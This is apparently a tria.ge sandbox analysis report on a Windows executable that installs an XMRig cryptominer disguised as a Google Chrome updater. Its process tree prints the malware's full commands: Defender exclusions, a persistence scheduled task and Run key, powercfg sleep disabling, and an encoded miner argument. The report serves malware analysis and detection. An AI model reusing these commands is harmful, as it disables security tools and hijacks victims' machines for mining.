Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
20/07/2023, 01:49
Static task
static1
Behavioral task
behavioral1
Sample
5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
Resource
win7-20230712-en
General
-
Target
5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe
-
Size
2.3MB
-
MD5
95ca970b99b80e1637f0058223ef20d7
-
SHA1
15fffa0937e2fc4a5b1adfea795f0e111327e86e
-
SHA256
5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
-
SHA512
e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8
-
SSDEEP
49152:2PqtTwUpl5X+V/Dwo88/YNO8cc6FCq87zgX69Im0E8O+GAH:NJDmLwo8AAxFg87zq698Vj
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 1832 created 1240 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 21 PID 1832 created 1240 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 21 PID 1832 created 1240 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 21 PID 1832 created 1240 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 21 PID 2800 created 1240 2800 updater.exe 21 PID 2800 created 1240 2800 updater.exe 21 PID 2800 created 1240 2800 updater.exe 21 PID 2800 created 1240 2800 updater.exe 21 PID 2800 created 1240 2800 updater.exe 21 PID 1968 created 1240 1968 conhost.exe 21 PID 2800 created 1240 2800 updater.exe 21 -
XMRig Miner payload 14 IoCs
resource yara_rule behavioral1/memory/2264-122-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-125-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-126-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-129-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-131-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-133-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-135-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-137-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-139-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-141-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-143-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-145-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-147-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig behavioral1/memory/2264-149-0x0000000140000000-0x00000001407F4000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 2800 updater.exe -
Loads dropped DLL 1 IoCs
pid Process 2680 taskeng.exe -
resource yara_rule behavioral1/memory/2264-122-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-125-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-126-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-129-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-131-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-133-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-135-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-137-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-139-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-141-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-143-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-145-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-147-0x0000000140000000-0x00000001407F4000-memory.dmp upx behavioral1/memory/2264-149-0x0000000140000000-0x00000001407F4000-memory.dmp upx -
Drops file in System32 directory 5 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 2800 updater.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2800 set thread context of 1968 2800 updater.exe 55 PID 2800 set thread context of 2264 2800 updater.exe 64 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2960 schtasks.exe 1732 schtasks.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2884 WMIC.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 3061207facbad901 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 2544 powershell.exe 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 2436 powershell.exe 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 1832 5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe 2840 powershell.exe 2800 updater.exe 2800 updater.exe 520 powershell.exe 2800 updater.exe 2800 updater.exe 2800 updater.exe 2800 updater.exe 1644 powershell.exe 2800 updater.exe 2800 updater.exe 2800 updater.exe 2800 updater.exe 1968 conhost.exe 1968 conhost.exe 2800 updater.exe 2800 updater.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe 2264 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 2544 powershell.exe Token: SeShutdownPrivilege 2420 powercfg.exe Token: SeShutdownPrivilege 2824 powercfg.exe Token: SeShutdownPrivilege 2952 powercfg.exe Token: SeDebugPrivilege 2436 powershell.exe Token: SeShutdownPrivilege 2804 powercfg.exe Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 520 powershell.exe Token: SeShutdownPrivilege 3048 powercfg.exe Token: SeShutdownPrivilege 2984 powercfg.exe Token: SeShutdownPrivilege 2864 powercfg.exe Token: SeDebugPrivilege 1644 powershell.exe Token: SeShutdownPrivilege 2904 powercfg.exe Token: SeAssignPrimaryTokenPrivilege 2884 WMIC.exe Token: SeIncreaseQuotaPrivilege 2884 WMIC.exe Token: SeSecurityPrivilege 2884 WMIC.exe Token: SeTakeOwnershipPrivilege 2884 WMIC.exe Token: SeLoadDriverPrivilege 2884 WMIC.exe Token: SeSystemtimePrivilege 2884 WMIC.exe Token: SeBackupPrivilege 2884 WMIC.exe Token: SeRestorePrivilege 2884 WMIC.exe Token: SeShutdownPrivilege 2884 WMIC.exe Token: SeSystemEnvironmentPrivilege 2884 WMIC.exe Token: SeUndockPrivilege 2884 WMIC.exe Token: SeManageVolumePrivilege 2884 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2884 WMIC.exe Token: SeIncreaseQuotaPrivilege 2884 WMIC.exe Token: SeSecurityPrivilege 2884 WMIC.exe Token: SeTakeOwnershipPrivilege 2884 WMIC.exe Token: SeLoadDriverPrivilege 2884 WMIC.exe Token: SeSystemtimePrivilege 2884 WMIC.exe Token: SeBackupPrivilege 2884 WMIC.exe Token: SeRestorePrivilege 2884 WMIC.exe Token: SeShutdownPrivilege 2884 WMIC.exe Token: SeSystemEnvironmentPrivilege 2884 WMIC.exe Token: SeUndockPrivilege 2884 WMIC.exe Token: SeManageVolumePrivilege 2884 WMIC.exe Token: SeLockMemoryPrivilege 2264 conhost.exe -
Suspicious use of WriteProcessMemory 41 IoCs
description pid Process procid_target PID 2860 wrote to memory of 2420 2860 cmd.exe 34 PID 2860 wrote to memory of 2420 2860 cmd.exe 34 PID 2860 wrote to memory of 2420 2860 cmd.exe 34 PID 2860 wrote to memory of 2824 2860 cmd.exe 35 PID 2860 wrote to memory of 2824 2860 cmd.exe 35 PID 2860 wrote to memory of 2824 2860 cmd.exe 35 PID 2860 wrote to memory of 2952 2860 cmd.exe 36 PID 2860 wrote to memory of 2952 2860 cmd.exe 36 PID 2860 wrote to memory of 2952 2860 cmd.exe 36 PID 2860 wrote to memory of 2804 2860 cmd.exe 37 PID 2860 wrote to memory of 2804 2860 cmd.exe 37 PID 2860 wrote to memory of 2804 2860 cmd.exe 37 PID 2436 wrote to memory of 2960 2436 powershell.exe 38 PID 2436 wrote to memory of 2960 2436 powershell.exe 38 PID 2436 wrote to memory of 2960 2436 powershell.exe 38 PID 2840 wrote to memory of 2004 2840 powershell.exe 41 PID 2840 wrote to memory of 2004 2840 powershell.exe 41 PID 2840 wrote to memory of 2004 2840 powershell.exe 41 PID 2680 wrote to memory of 2800 2680 taskeng.exe 43 PID 2680 wrote to memory of 2800 2680 taskeng.exe 43 PID 2680 wrote to memory of 2800 2680 taskeng.exe 43 PID 1472 wrote to memory of 3048 1472 cmd.exe 50 PID 1472 wrote to memory of 3048 1472 cmd.exe 50 PID 1472 wrote to memory of 3048 1472 cmd.exe 50 PID 1472 wrote to memory of 2984 1472 cmd.exe 51 PID 1472 wrote to memory of 2984 1472 cmd.exe 51 PID 1472 wrote to memory of 2984 1472 cmd.exe 51 PID 1472 wrote to memory of 2864 1472 cmd.exe 52 PID 1472 wrote to memory of 2864 1472 cmd.exe 52 PID 1472 wrote to memory of 2864 1472 cmd.exe 52 PID 1644 wrote to memory of 1732 1644 powershell.exe 53 PID 1644 wrote to memory of 1732 1644 powershell.exe 53 PID 1644 wrote to memory of 1732 1644 powershell.exe 53 PID 1472 wrote to memory of 2904 1472 cmd.exe 54 PID 1472 wrote to memory of 2904 1472 cmd.exe 54 PID 1472 wrote to memory of 2904 1472 cmd.exe 54 PID 2800 wrote to memory of 1968 2800 updater.exe 55 PID 1976 wrote to memory of 2884 1976 cmd.exe 60 PID 1976 wrote to memory of 2884 1976 cmd.exe 60 PID 1976 wrote to memory of 2884 1976 cmd.exe 60 PID 2800 wrote to memory of 2264 2800 updater.exe 64 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1240
-
C:\Users\Admin\AppData\Local\Temp\5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe"C:\Users\Admin\AppData\Local\Temp\5bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2544
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wtqefibev#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:2960
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2420
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2824
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eivudnbn#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵PID:2004
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:520
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1472 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2984
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2864
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wtqefibev#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
PID:1732
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe mrldfcnkjtpom2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:1968
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1788
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe xserwfqvlxzoakxb 6E3sjfZq2rJQaxvLPmXgsK/+j3+8kDQ50juBnXtgaNA5bXl8IhyJSVhC36oZ+LR7lRivqD2W2bSOssOtPqg4HmIYu1ls2lpjcAH6qJ/SIKeKkM1SHWo+dKhkJtHeuU+yQmsnWIoUmtoW7e6Z4Dole3MZ9tZh9LFCmjgpfo3IgNPGB5P/yRBaU6wxNgZR5ApqnjpoSKIyxK0GafxBvWEzKAEE/zININMm9jsZx0QqFdVKqikZI/OJ3mwRUN8sAZywSMB0/qZvqzrUFg0MfWX3nC4UjaI8biSgyb8RqGEmL5ekF1REezN23lpYPUSUJ31ougdPmt+b+rrAhnaodpEH8eCfc/WDYSDjK5avdVO5fHKag5a2RKDTnDhBFRPD7F68F8M8XkzAY4OTONT0I9lTyUhnVIqeRPED30OBUm+mK1PQs5L1bor5jPTRjTi1cXuqE2dHZxMDzbglHSZmkVVFrmWrzDT4ZpnFwgMjjKERI4A=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {3072B7AE-9B04-46B6-957D-E308274CF491} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2800
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.3MB
MD595ca970b99b80e1637f0058223ef20d7
SHA115fffa0937e2fc4a5b1adfea795f0e111327e86e
SHA2565bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
SHA512e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8
-
Filesize
2.3MB
MD595ca970b99b80e1637f0058223ef20d7
SHA115fffa0937e2fc4a5b1adfea795f0e111327e86e
SHA2565bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
SHA512e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53711935800dead2cd6c78c03f9068f85
SHA16a1b8e5def76ca7a05be306680363c1610c798ec
SHA2569ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a
SHA512c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD53711935800dead2cd6c78c03f9068f85
SHA16a1b8e5def76ca7a05be306680363c1610c798ec
SHA2569ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a
SHA512c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3W1PPQC4CHJX1XXNYBI.temp
Filesize7KB
MD53711935800dead2cd6c78c03f9068f85
SHA16a1b8e5def76ca7a05be306680363c1610c798ec
SHA2569ad468baa440de74d0939bb7b923347e517a6b59e5644fe99c10830da953f00a
SHA512c541910cc3e8a223b5f26f7bd4916c4a7f85c367f1b0f5c2adb67f3daa44decff7a200325a07c3ac844c8618bb2973c8cf7f59262922d1291be8b09eb0e07125
-
Filesize
2.3MB
MD595ca970b99b80e1637f0058223ef20d7
SHA115fffa0937e2fc4a5b1adfea795f0e111327e86e
SHA2565bbe6ef920b3ba77b1f08a6b8fc3359dd5f4ede3899928ff59266a8cc11dcfa5
SHA512e4bc541d1afee5a604150c9d63a75ed3ba9b12b4a85804d3fec88b3ca6c950aad6298a0e1af0bbd476851b712b14aaae8eac6ee037ff025aa1cd2ddc9f74adf8